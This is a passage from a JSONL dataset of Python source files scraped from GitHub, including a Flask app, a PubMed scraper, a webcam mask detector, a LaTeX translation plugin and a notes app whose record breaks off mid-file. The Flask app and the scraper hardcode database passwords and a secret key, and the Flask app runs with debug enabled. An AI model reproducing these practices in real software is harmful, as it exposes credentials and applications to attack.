]\nprint(category_list)\n\nnum_classes = len(category_list)\nimg_size = 128\nbatch_size = 32\n\ntransform = transforms.Compose([\n transforms.Resize([img_size, img_size]), \n transforms.ToTensor()\n ])\n\ntrain_dataset = datasets.ImageFolder(os.path.join(PATH, \"train\"), transform)\ntrain_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True, num_workers=2)\n\nvalidation_dataset = datasets.ImageFolder(os.path.join(PATH, \"validation\"), transform)\nvalidation_loader = DataLoader(dataset=validation_dataset, batch_size=batch_size, shuffle=True, num_workers=2)\n\nwith tqdm(total=len(train_loader)) as t:\n t.set_description(f'Train Loader')\n for i, (batch_img, batch_lab) in enumerate(train_loader):\n time.sleep(0.1)\n # Add feedforward & Optimization code\n t.set_postfix({\"Train data shape\": f\"{batch_img.shape} {batch_lab.shape}\"})\n t.update()\n\nwith tqdm(total=len(validation_loader)) as t:\n t.set_description(f'Validation Loader')\n for i, (batch_img, batch_lab) in enumerate(validation_loader):\n time.sleep(0.1)\n # Add evaluation code\n t.set_postfix({\"Validation data shape\": f\"{batch_img.shape} {batch_lab.shape}\"})\n t.update()","repo_name":"jjerry-k/learning_framework","sub_path":"04_Extra/DataLoading/PyTorch/ver_torchvision.py","file_name":"ver_torchvision.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"32"} +{"seq_id":"18626913671","text":"import os\nfrom flask import Flask, render_template\nfrom flask import send_from_directory\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:12345@127.0.0.1:3306/project'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\napp.config['SECRET_KEY'] = 'my_project'\n# app.config['UPLOAD_FOLDER'] = 'UPLOAD_FOLDER'\n\nBASE_DIRS = os.path.dirname(os.path.abspath(__file__))\n\nUPLOADED_FILES_DIR = os.path.join(BASE_DIRS, 'media')\napp.config['UPLOAD_FOLDER'] = UPLOADED_FILES_DIR\nif not os.path.isdir(UPLOADED_FILES_DIR):\n os.mkdir(UPLOADED_FILES_DIR)\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(UPLOADED_FILES_DIR, filename)\n\n\nfrom controllers import *\nfrom extention import *\nfrom models import *\n\nif __name__ == '__main__':\n app.init_app(db)\n app.init_app(migrate)\n app.run(port=5000, debug=True)","repo_name":"nusrat52/projects","sub_path":"practice3/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"26477883201","text":"from unittest.mock import patch\n\nfrom test.BaseCase import BaseCase\n\n\nclass TestGetMyUser(BaseCase):\n\n @BaseCase.login\n def test_ok(self, token):\n response = self.application.get('/private/get_my_user',\n headers=self.get_standard_header(token))\n\n self.assertEqual(200, response.status_code)\n\n @BaseCase.login\n @patch('db.db.DB.get')\n def test_unexisting_object(self, mock_get, token):\n mock_get.return_value = []\n\n response = self.application.get('/private/get_my_user',\n headers=self.get_standard_header(token))\n\n self.assertEqual(\"401 The user has not been found\", response.status)\n","repo_name":"CybersecurityLuxembourg/openxeco-core","sub_path":"oxe-api/test/resource/private/test_get_my_user.py","file_name":"test_get_my_user.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"27454614128","text":"# adicionar conteúdo em arquivo de texto já existente\r\n\r\n# abre o arquivo para adicionar informações\r\narquivo = open('exercicio01.txt', 'a', encoding='UTF-8') # a = Append\r\n\r\n# cadastra o nome e idade de 5 pessoas e adiciona no arquivo de texto\r\nfor i in range(10):\r\n idade = int(input('Informe num: '))\r\n arquivo.write(str(idade) + '\\n')\r\n\r\narquivo.close() # fecha o arquivo\r\n","repo_name":"lucasvil4r/python_programacao_orientada_a_objetos","sub_path":"AULA_12/exercicios01.py","file_name":"exercicios01.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"73172303130","text":"#Libraries used for this project\nimport numpy as np\nimport cv2\n\n#Setting pre-trained classifiers for each element of the face desired\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\nnose_cascade = cv2.CascadeClassifier('haarcascade_mcs_nose.xml')\nmouth_cascade = cv2.CascadeClassifier('haarcascade_mcs_mouth.xml')\n\n#Validating that the pre-trained classifiers are ready\nif mouth_cascade.empty():\n raise IOError('Unable to load the mouth cascade classifier xml file')\n \nif nose_cascade.empty():\n raise IOError('Unable to load the nose cascade classifier xml file')\n\nif face_cascade.empty():\n raise IOError('Unable to load the face cascade classifier xml file')\n \n#Staring the streaming of the video \ncap = cv2.VideoCapture(0)\nds_factor = 0.5\n\n#Flags that tells which element of the face is detected\nflagFace=False\nflaNose=False\nflaMouth=False\n\n#initial value of text that shows the result of the scanning position\nxt=10\nyt=10\n\n#Constantly capturing data\nwhile True:\n \n #Saving the frame captured by the streaming\n ret, frame = cap.read()\n frame = cv2.resize(frame, None, fx=ds_factor, fy=ds_factor, interpolation=cv2.INTER_AREA)\n #Frame processing to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n #Multiscaling image processing for taking measurements from several possible angles\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n #Searching for the face features \n for (x,y,w,h) in faces:\n #Labelling the face with a blue rectangle\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n flagFace=True\n #The result tag goes with the face frame, labeling the subject on real time\n xt=x\n yt=y\n break\n \n if flagFace: \n mouth_rects = mouth_cascade.detectMultiScale(gray, 1.7, 11)\n for (xm,ym,wm,hm) in mouth_rects:\n ym = int(ym - 0.15*hm)\n #Labelling the mouth with a green rectangle\n cv2.rectangle(frame, (xm,ym), (xm+wm,ym+hm),(0,255,0), 3)\n flaMouth=True\n break\n \n \n nose_rects = nose_cascade.detectMultiScale(gray, 1.3, 5)\n for (xn,yn,wn,hn) in nose_rects:\n #Labelling the nose with a green rectangle\n cv2.rectangle(frame, (xn,yn), (xn+wn,yn+hn), (0,255,0), 3)\n flaNose=True\n break\n #If any of the two parts is detected, then it will be a covidiot\n #Showing the results of the scanning, labeling the subject on real time\n if (flaMouth or flaNose):\n #\"Covidiot detected\" on red to show the break of the rule/ bad use of the mask\n cv2.putText(frame,\"COVIDIOT DETECTED\", (xt,yt), cv2.FONT_ITALIC, 0.5, (0,0,255))\n \n else:\n #\"Good citizen\" on green to show a well use of the mask\n cv2.putText(frame,\"GOOD CITIZEN\", (xt,yt), cv2.FONT_ITALIC, 0.5, (0,255,0))\n \n \n #Re-initializing the flags for the next scanning \n flagFace=False\n flaNose=False\n flaMouth=False\n \n #Labelling of the tool\n cv2.imshow('COVIDiots Detector', frame)\n \n #If the key ESC is pressed, the window is closed\n c = cv2.waitKey(1)\n #ESC key decimal's equivalente, in ASCII, is 27\n if c == 27: \n break\n\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"anludu/COVIDiots-Detector","sub_path":"PFv1.py","file_name":"PFv1.py","file_ext":"py","file_size_in_byte":3339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19437975565","text":"import time\nimport dlocr\n\nif __name__ == '__main__':\n ocr = dlocr.get_or_create()\n start = time.time()\n\n bboxes, texts = ocr.detect(r\"C://Users//Hasee//Desktop//535.png\")\n print('\\n'.join(texts))\n print(\"cost: {:0.2f}s\".format((time.time() - start)))","repo_name":"scscyawh/AI","sub_path":"dlocr/a123.py","file_name":"a123.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3459596325","text":"import requests\nfrom bs4 import BeautifulSoup\nimport pm_ids\nimport json\nimport pandas as pd\nimport database\nimport psycopg2\n\nclass Literature:\n\tdef __init__(self):\n\t\tself.arr = []\n\t\tself.headers = [\"pm_id\",\"title\", \"abstract\", \"publication_types\", \"mesh_terms\", \"substances\"]\n\t\tself.ids = pm_ids.get_pm_ids()\n\t\tself.conn = psycopg2.connect(database = \"postgres\", user = \"postgres\", password = \"pass123\", \n\t\t\thost = \"127.0.0.1\", port = \"5432\")\n\n\tdef get_title(self, soup):\n\t\treturn soup.title.text.strip()\n\n\tdef get_abstract(self, soup):\n\t\tabstract_text = soup.find('div', id=\"abstract\")\n\t\tif abstract_text:\n\t\t\treturn abstract_text.text.strip()\n\t\treturn\n\n\tdef get_publication_types(self, soup):\n\t\ttypes = soup.find('div', id=\"publication-types\")\n\t\tpublication_types = {}\n\n\t\tif types is not None:\n\t\t\tfor child in types.children:\n\t\t\t\tif child.name == \"ul\":\n\t\t\t\t\tfor grand_child in child:\n\t\t\t\t\t\tif grand_child.name == \"li\" and grand_child.div.button.text.strip():\n\t\t\t\t\t\t\tpublication_types[grand_child.div.button.text.strip()] = True\n\t\treturn publication_types\n\n\tdef get_mesh_terms(self, soup):\n\t\ttypes = soup.find('div', id=\"mesh-terms\")\n\t\tmesh_terms = {}\n\n\t\tif types is not None:\n\t\t\tfor child in types.children:\n\t\t\t\tif child.name == \"ul\":\n\t\t\t\t\tfor grand_child in child:\n\t\t\t\t\t\tif grand_child.name == \"li\" and grand_child.div.button.text.strip():\n\t\t\t\t\t\t\tmesh_terms[grand_child.div.button.text.strip()] = True\n\t\treturn mesh_terms\n\n\tdef get_substances(self, soup):\n\t\ttypes = soup.find('div', id=\"substances\")\n\t\tsubstances = {}\n\n\t\tif types is not None:\n\t\t\tfor child in types.children:\n\t\t\t\tif child.name == \"ul\":\n\t\t\t\t\tfor grand_child in child:\n\t\t\t\t\t\tif grand_child.name == \"li\" and grand_child.div.button.text.strip():\n\t\t\t\t\t\t\tsubstances[grand_child.div.button.text.strip()] = True\n\t\treturn substances\n\n\tdef close_connection(self):\n\t\tself.conn.close()\n\n\tdef start(self):\n\t\t# looping through the 100 pm_ids scrapped\n\t\tfor pm_id in self.ids:\n\t\t\tprint(pm_id, \" pm_id started\")\n\n\t\t\turl = \"https://pubmed.ncbi.nlm.nih.gov/\" + str(pm_id)\n\t\t\tresponse = requests.get(url)\n\t\t\tsoup = BeautifulSoup(response.content, 'html.parser')\n\n\t\t\t#title\n\t\t\ttitle = self.get_title(soup)\n\n\t\t\t#abstract\n\t\t\tabstract = self.get_abstract(soup)\n\n\t\t\t#publication types\n\t\t\tpublication_types = self.get_publication_types(soup)\n\n\t\t\t#mesh types\n\t\t\tmesh_terms = self.get_mesh_terms(soup)\n\n\t\t\t#substances\n\t\t\tsubstances = self.get_substances(soup)\n\n\t\t\trow = [pm_id, title, abstract, publication_types, mesh_terms, substances]\n\n\t\t\t#db write\n\t\t\tdatabase.add_row_to_literature(self.conn,row)\n\n\t\t\tself.arr.append(row)\n\t\t\tprint(pm_id, \" pm_id finished\")\n\n\t\t# write to csv\n\t\tpd.DataFrame(self.arr, columns = self.headers).to_csv('data.csv')\n","repo_name":"unni12345/LitSearch","sub_path":"literature.py","file_name":"literature.py","file_ext":"py","file_size_in_byte":2690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9028227197","text":"from typing import List, Tuple\n\nTAX_RATE: float = .2\nDISCOUNT: float = .9\n\nINVALID_PRICE: str = 'Invalid price!'\nINVALID_ORDER: str = 'Invalid order!'\n\nSPC: str = 'special'\nRGL: str = 'regular'\n\ntotal: float = float()\n\nwhile True:\n in_data: str = input()\n if in_data in [SPC, RGL]:\n customer = in_data\n break\n else:\n charge: float = float(in_data)\n if charge > 0:\n total += charge\n else:\n print(INVALID_PRICE)\n\ntaxes: float = total * TAX_RATE\n\nif customer == SPC:\n final: float = (total + taxes) * DISCOUNT\nelse:\n final: float = total + taxes\n\nreceipt: str = f'''Congratulations you've just bought a new computer!\nPrice without taxes: {total:.2f}$\nTaxes: {taxes:.2f}$\n-----------\nTotal price: {final:.2f}$\n'''\n\nif final > 0:\n print(receipt)\nelse:\n print(INVALID_ORDER)\n","repo_name":"sleepychild/SoftUni_SE","sub_path":"FUNDAMENTALS_MODULE/Exam_Exercise_Mid/Computer_Store.py","file_name":"Computer_Store.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8984458030","text":"from .style_maker import Style_Maker\ndef intstr(val):\n return str(int(val))\n\nlight_blue = [77, 166, 222]\nmid_blue = [0,101,179]\ndark_blue = [0, 66, 144]\nempty_color = [0,0,0,0]\nwhite = [255,255,255]\nblack = [0,0,0]\ngray = [240,240,240]\n\n####################### detailed styles ######################\nbase_tone = Style_Maker('', bgd_color=white, color=dark_blue)\ntext_tone = Style_Maker('', bgd_color=empty_color, color=black, border_style='none')\nbutton_tone = Style_Maker('QPushButton', text_align='center', bgd_color=gray+[0.5],\n font=12, border_width='1px', border_radius='6px',\n border_style='outset', border_color=black, padding='5 5 5 5px')\n\n######################## detailed styles ########################\nmain_style = base_tone.style()\n\n############################ texts ##############################\ninfo_style = text_tone.head('QLabel').alter(font=18).style()\n\n############################ buttons ############################\nleaf_button_style = button_tone.style() + \\\n button_tone.head('QPushButton:hover').alter(bgd_color=[230, 230, 230]).style() + \\\n button_tone.head('QPushButton:pressed').alter(bgd_color=[0, 0, 0]).style()\n","repo_name":"AceSix/Simple_Viewer","sub_path":"config/styles.py","file_name":"styles.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34862605220","text":"def oneAway(s1,s2):\n\tdict={}\n\tfor i in range(0,len(s1)):\n\t\tif s1[i] in dict:\n\t\t\tdict[s1[i]]=dict[s1[i]]+1\n\t\telse:\n\t\t\tdict[s1[i]]=1\n\tif(abs(len(s1)-len(s2))>1):\n\t\treturn \"False\"\n\n\treturn check(dict,s1,s2)\ndef check(d,s1,s2):\n\tcount=0\n\tif(len(s1)==len(s2)):\n\t\tfor i in range(0,len(s2)):\n\t\t\tif s2[i] in d:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tcount=count+1;\n\t\t\t\tif(count>1):\n\t\t\t\t\treturn -1\n\t\tfor i in d:\n\t\t \t\tif(d[i]>0):\n\t\t \t\t\treturn \"False\"\n\t\treturn \"True\"\n\telse:\n\t\t# for i in range(0,len(s2)):\n\t\t# \tif s2[i] in d:\n\t\t# \t\tif(d[s2[i]]==0):\n\t\t# \t\t\treturn \"False\"\n\t\t# \t\td[s2[i]]=d[s2[i]]-1\n\t\t# \t\tpass\n\t\t# \telse:\n\t\t# \t\tcount=count+1\n\t\t# \t\tif(count>1):\n\t\t# \t\t\treturn \"False\"\n\t\t# return \"True\"\n\t\t \tfor i in range(0,len(s2)):\n\t\t \t\tif s2[i] in d:\n\t\t \t\t\tif(d[s2[i]]==0):\n\t\t \t\t\t\treturn \"False\"\n\t\t \t\t\td[s2[i]]=d[s2[i]]-1\n\t\t \t\telse:\n\t\t \t\t\tcount=count+1\n\t\t \t\t\tif(count>1):\n\t\t \t\t\t\treturn \"False\"\n\t\t \tfor i in d:\n\t\t \t\tif(d[i]>0):\n\t\t \t\t\treturn \"False\"\n\t\t \treturn \"True\"\n\n\n\nprint(oneAway(\"supraja\",\"supejaa\"))\n\n\n\t\n\n\n","repo_name":"ponnursupraja/CCI","sub_path":"oneAway.py","file_name":"oneAway.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28749173844","text":"from difflib import SequenceMatcher\nimport json\nimport sys\nsys.path.insert(0, '../mwp_solver')\nfrom run_solver import MWP_Solver\nfrom constants import TRAINSET_PATH, TESTSET_PATH, VALIDSET_PATH\n\nclass Test_Unsimilar:\n def __init__(self, similar_ratio=0.8):\n self.similar_ratio = similar_ratio\n \n def remove_similar(self):\n new_testset = []\n\n with open(TESTSET_PATH) as test_file:\n test_data = json.load(test_file)\n \n with open(TRAINSET_PATH) as train_file:\n train_data = json.load(train_file)\n \n train_questions = [x[\"original_text\"] for x in train_data]\n\n for test_question in test_data:\n max_ratio = 0\n test_nl = test_question[\"original_text\"]\n for train_nl in train_questions:\n max_ratio = max(max_ratio, SequenceMatcher(None, test_nl, train_nl).ratio())\n if max_ratio < self.similar_ratio:\n new_testset.append(test_question)\n\n with open(TESTSET_PATH, \"w\", encoding=\"utf-8\") as testset_file:\n json.dump(new_testset, testset_file, ensure_ascii=False, indent=4)\n \n def test_unsimilar(self):\n self.remove_similar()\n solver = MWP_Solver()\n test_results = solver.test_solver(set_created=True)\n\n results = {}\n \n results[\"Graph2Tree_Test_Unsimilar\"] = test_results[\"Graph2Tree_Test\"]\n results[\"SAUSolver_Test_Unsimilar\"] = test_results[\"SAUSolver_Test\"]\n\n return results\n\n# test1 = MWP_Solver()\n# print(test1.test_solver(set_created=True))\n# test = Test_Unsimilar()\n# print(test.test_unsimilar())","repo_name":"max-stack/MWP_SS_Metrics","sub_path":"similarity_test/test_unsimilar.py","file_name":"test_unsimilar.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2197168480","text":"\"\"\"Hay dos maneras de declarar un diccionario\"\"\"\n\ndiccionario = {}\ndiccionario = dict( )\n\n#{los valores que queremos asociar}\ndiccionario= {\"total\" : 55}\nprint (diccionario)\ndiccionario={\"total\":55, \"descuento\": True}\nprint (diccionario)\n\n\n#[son diccionarios inmutables, no pueden cambiar su valor]\nelementos = {}\n#dentro de la llave se le agrega la llave y después el valor que se le da a la llave\n\nelementos['nombre']= 'Karen' \nprint(elementos)\n\"\"\"\nsi la llave no existe, la crea\nsi la llave si existe, actualiza el valor que la llave almacena\n\n\"\"\"\nelementos['nombre']= 'Jocelyn' #aquí se actualiza la llave con un nuevo valor\nprint(elementos)\n","repo_name":"KarenHernandez08/Python","sub_path":"python_curso/disccionarios.py","file_name":"disccionarios.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"73747351452","text":"from toolbox import update_ui, promote_file_to_downloadzone\nfrom toolbox import CatchException, report_execption, write_history_to_file\nfast_debug = False\n\nclass PaperFileGroup():\n def __init__(self):\n self.file_paths = []\n self.file_contents = []\n self.sp_file_contents = []\n self.sp_file_index = []\n self.sp_file_tag = []\n\n # count_token\n from request_llm.bridge_all import model_info\n enc = model_info[\"gpt-3.5-turbo\"]['tokenizer']\n def get_token_num(txt): return len(enc.encode(txt, disallowed_special=()))\n self.get_token_num = get_token_num\n\n def run_file_split(self, max_token_limit=1900):\n \"\"\"\n 将长文本分离开来\n \"\"\"\n for index, file_content in enumerate(self.file_contents):\n if self.get_token_num(file_content) < max_token_limit:\n self.sp_file_contents.append(file_content)\n self.sp_file_index.append(index)\n self.sp_file_tag.append(self.file_paths[index])\n else:\n from .crazy_utils import breakdown_txt_to_satisfy_token_limit_for_pdf\n segments = breakdown_txt_to_satisfy_token_limit_for_pdf(file_content, self.get_token_num, max_token_limit)\n for j, segment in enumerate(segments):\n self.sp_file_contents.append(segment)\n self.sp_file_index.append(index)\n self.sp_file_tag.append(self.file_paths[index] + f\".part-{j}.tex\")\n\n print('Segmentation: done')\n\ndef 多文件翻译(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, language='en'):\n import time, os, re\n from .crazy_utils import request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency\n\n # <-------- 读取Latex文件,删除其中的所有注释 ----------> \n pfg = PaperFileGroup()\n\n for index, fp in enumerate(file_manifest):\n with open(fp, 'r', encoding='utf-8', errors='replace') as f:\n file_content = f.read()\n # 定义注释的正则表达式\n comment_pattern = r'(? \n pfg.run_file_split(max_token_limit=1024)\n n_split = len(pfg.sp_file_contents)\n\n # <-------- 抽取摘要 ----------> \n # if language == 'en':\n # abs_extract_inputs = f\"Please write an abstract for this paper\"\n\n # # 单线,获取文章meta信息\n # paper_meta_info = yield from request_gpt_model_in_new_thread_with_ui_alive(\n # inputs=abs_extract_inputs,\n # inputs_show_user=f\"正在抽取摘要信息。\",\n # llm_kwargs=llm_kwargs,\n # chatbot=chatbot, history=[],\n # sys_prompt=\"Your job is to collect information from materials。\",\n # )\n\n # <-------- 多线程润色开始 ----------> \n if language == 'en->zh':\n inputs_array = [\"Below is a section from an English academic paper, translate it into Chinese, do not modify any latex command such as \\section, \\cite and equations:\" + \n f\"\\n\\n{frag}\" for frag in pfg.sp_file_contents]\n inputs_show_user_array = [f\"翻译 {f}\" for f in pfg.sp_file_tag]\n sys_prompt_array = [\"You are a professional academic paper translator.\" for _ in range(n_split)]\n elif language == 'zh->en':\n inputs_array = [f\"Below is a section from a Chinese academic paper, translate it into English, do not modify any latex command such as \\section, \\cite and equations:\" + \n f\"\\n\\n{frag}\" for frag in pfg.sp_file_contents]\n inputs_show_user_array = [f\"翻译 {f}\" for f in pfg.sp_file_tag]\n sys_prompt_array = [\"You are a professional academic paper translator.\" for _ in range(n_split)]\n\n gpt_response_collection = yield from request_gpt_model_multi_threads_with_very_awesome_ui_and_high_efficiency(\n inputs_array=inputs_array,\n inputs_show_user_array=inputs_show_user_array,\n llm_kwargs=llm_kwargs,\n chatbot=chatbot,\n history_array=[[\"\"] for _ in range(n_split)],\n sys_prompt_array=sys_prompt_array,\n # max_workers=5, # OpenAI所允许的最大并行过载\n scroller_max_len = 80\n )\n\n # <-------- 整理结果,退出 ----------> \n create_report_file_name = time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.localtime()) + f\"-chatgpt.polish.md\"\n res = write_history_to_file(gpt_response_collection, create_report_file_name)\n promote_file_to_downloadzone(res, chatbot=chatbot)\n history = gpt_response_collection\n chatbot.append((f\"{fp}完成了吗?\", res))\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n\n\n\n\n\n@CatchException\ndef Latex英译中(txt, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, web_port):\n # 基本信息:功能、贡献者\n chatbot.append([\n \"函数插件功能?\",\n \"对整个Latex项目进行翻译。函数插件贡献者: Binary-Husky\"])\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n\n # 尝试导入依赖,如果缺少依赖,则给出安装建议\n try:\n import tiktoken\n except:\n report_execption(chatbot, history,\n a=f\"解析项目: {txt}\",\n b=f\"导入软件依赖失败。使用该模块需要额外依赖,安装方法```pip install --upgrade tiktoken```。\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n history = [] # 清空历史,以免输入溢出\n import glob, os\n if os.path.exists(txt):\n project_folder = txt\n else:\n if txt == \"\": txt = '空空如也的输入栏'\n report_execption(chatbot, history, a = f\"解析项目: {txt}\", b = f\"找不到本地项目或无权访问: {txt}\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.tex', recursive=True)]\n if len(file_manifest) == 0:\n report_execption(chatbot, history, a = f\"解析项目: {txt}\", b = f\"找不到任何.tex文件: {txt}\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n yield from 多文件翻译(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, language='en->zh')\n\n\n\n\n\n@CatchException\ndef Latex中译英(txt, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, web_port):\n # 基本信息:功能、贡献者\n chatbot.append([\n \"函数插件功能?\",\n \"对整个Latex项目进行翻译。函数插件贡献者: Binary-Husky\"])\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n\n # 尝试导入依赖,如果缺少依赖,则给出安装建议\n try:\n import tiktoken\n except:\n report_execption(chatbot, history,\n a=f\"解析项目: {txt}\",\n b=f\"导入软件依赖失败。使用该模块需要额外依赖,安装方法```pip install --upgrade tiktoken```。\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n history = [] # 清空历史,以免输入溢出\n import glob, os\n if os.path.exists(txt):\n project_folder = txt\n else:\n if txt == \"\": txt = '空空如也的输入栏'\n report_execption(chatbot, history, a = f\"解析项目: {txt}\", b = f\"找不到本地项目或无权访问: {txt}\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n file_manifest = [f for f in glob.glob(f'{project_folder}/**/*.tex', recursive=True)]\n if len(file_manifest) == 0:\n report_execption(chatbot, history, a = f\"解析项目: {txt}\", b = f\"找不到任何.tex文件: {txt}\")\n yield from update_ui(chatbot=chatbot, history=history) # 刷新界面\n return\n yield from 多文件翻译(file_manifest, project_folder, llm_kwargs, plugin_kwargs, chatbot, history, system_prompt, language='zh->en')","repo_name":"binary-husky/gpt_academic","sub_path":"crazy_functions/Latex全文翻译.py","file_name":"Latex全文翻译.py","file_ext":"py","file_size_in_byte":8389,"program_lang":"python","lang":"en","doc_type":"code","stars":47095,"dataset":"github-code","pt":"32"} +{"seq_id":"6542494948","text":"import sys\n\nfrom PySide6.QtWidgets import *\n\nimport GUI\nfrom View.TextEditor import TextEditor\n\nsys.path.append('../')\nfrom Model.Note import Note\nfrom APIHelper import NoteHelper, LoginHelper\n\n\nclass Menu(QWidget):\n def __init__(self, parent):\n super().__init__()\n self.parent: GUI = parent\n self.initMe()\n\n def initMe(self):\n self.resize(450, 800)\n self.setWindowTitle(\"FraUasNotes\")\n self.parent.allNotes = NoteHelper.getAllNotes(self.parent.token)\n\n # Buttons\n self.newNoteButton = QPushButton(\"New note\", self)\n self.newNoteButton.clicked.connect(self._clickNewNote)\n self.logoutButton = QPushButton(\"Log out\", self)\n self.logoutButton.clicked.connect(self._clickLogout)\n self.deleteButton = QPushButton(\"Delete Notes\", self)\n self.deleteButton.clicked.connect(self._clickDelete)\n self.HBox1 = QHBoxLayout(self)\n self.layout = self.HBox1\n\n self.VBox2 = QVBoxLayout()\n self.HBox1.addLayout(self.VBox2)\n\n # create notes list\n self.QnoteList = QListWidget()\n self.QnoteList.setStyleSheet(\n \"QListWidget{width: 70%; height: 100%; border-width: 30px; font-size: large;} QListWidget::Item::{background-color: black ;}\")\n self.VBox2.addWidget(self.QnoteList)\n self.QnoteList.itemClicked.connect(self._clickNote)\n\n # fill notes list\n self.filNotesList(self.QnoteList)\n\n\n\n\n self.VBox1 = QVBoxLayout()\n self.HBox1.addLayout(self.VBox1)\n self.VBox1.addWidget(self.newNoteButton)\n self.VBox1.addWidget(self.logoutButton)\n self.VBox1.addWidget(self.deleteButton)\n self.VBox1.addStretch(1)\n\n def filNotesList(self, list: QListWidget):\n self.parent.allNotes = NoteHelper.getAllNotes(self.parent.token)\n print(f\"filling noteslist {list} with notes: {self.parent.allNotes}\")\n list.clear()\n try:\n for note in self.parent.allNotes:\n tempItem = QListWidgetItem(note.title)\n self.QnoteList.addItem(tempItem)\n except:\n pass\n # deprecated\n def loadNotesList(self):\n print(\"HI\")\n self.parent.allNotes = NoteHelper.getAllNotes(self.parent.token)\n print(f\"load noteslist with notes: {self.parent.allNotes}\")\n self.QnoteList = QListWidget()\n self.QnoteList.setStyleSheet(\n \"QListWidget{width: 70%; height: 100%; border-width: 30px; font-size: large;} QListWidget::Item::{background-color: black ;}\")\n self.VBox2.addWidget(self.QnoteList)\n try:\n for note in self.parent.allNotes:\n tempItem = QListWidgetItem(note.title)\n self.QnoteList.addItem(tempItem)\n except:\n pass\n self.QnoteList.itemClicked.connect(self._clickNote)\n\n def _clickNote(self):\n for note in self.parent.allNotes:\n if self.QnoteList.currentItem().text() == note.title:\n self.parent.OpenTextEditor(note)\n self.close()\n\n def _clickLogout(self):\n LoginHelper.logout(self.parent.token)\n self.parent.UserLogin()\n self.close()\n\n def _clickNewNote(self):\n note = Note(None, \"New Note\", None, None)\n self.parent.OpenTextEditor(note, True)\n self.close()\n\n def _clickDelete(self):\n self.deleteDialog = DeleteDialog(self)\n\n\n\nclass DeleteDialog(QDialog):\n def __init__(self, parent):\n super().__init__()\n self.parent: Menu = parent\n self._initMe()\n self.show()\n\n def _initMe(self):\n self.resize(300, 300)\n\n listWidget = QListWidget()\n self.setWindowTitle(\"Delete Notes\")\n\n for note in self.parent.parent.allNotes:\n QListWidgetItem(note.title, listWidget)\n\n window_layout = QVBoxLayout(self)\n window_layout.addWidget(listWidget)\n\n button = QPushButton(\"Delete\")\n\n def delete():\n delNote: Note = None\n for note in self.parent.parent.allNotes:\n if listWidget.currentItem().text() == note.title:\n delNote = note\n try:\n print(listWidget.currentItem().text())\n listWidget.takeItem(listWidget.currentIndex().row())\n NoteHelper.deleteNote(self.parent.parent.token, delNote)\n #self.parent.parent.allNotes = NoteHelper.getAllNotes(self.parent.token)\n self.parent.filNotesList(self.parent.QnoteList)\n except AttributeError:\n pass\n\n button.clicked.connect(delete)\n window_layout.addWidget(button)\n\n self.setLayout(window_layout)\n\n\n\n '''\n \n self.list = QListWidget()\n\n for note in self.allNotes:\n QListWidgetItem(note.title, self.list)\n\n self.button = QPushButton(\"Delete\")\n def _click():\n #self.list.takeItem(self.list.currentIndex().row())\n #print(f\"QDialog is trying to delete {self.list.currentItem()}\")\n print(\"Hi\")\n\n self.button.clicked.connect(_click())\n\n self.window_layout = QVBoxLayout(self)\n self.window_layout.addWidget(self.list)\n self.window_layout.addWidget(self.button)\n self.setLayout(self.window_layout)\n\n \n \n ######\n deleteDialog = QDialog()\n deleteDialog.setWindowTitle(\"Delete Note\")\n deleteDialog.resize(400, 300)\n notesList = self.getNotesList(deleteDialog)\n\n deleteButton = QPushButton(\"Delete\", deleteDialog)\n 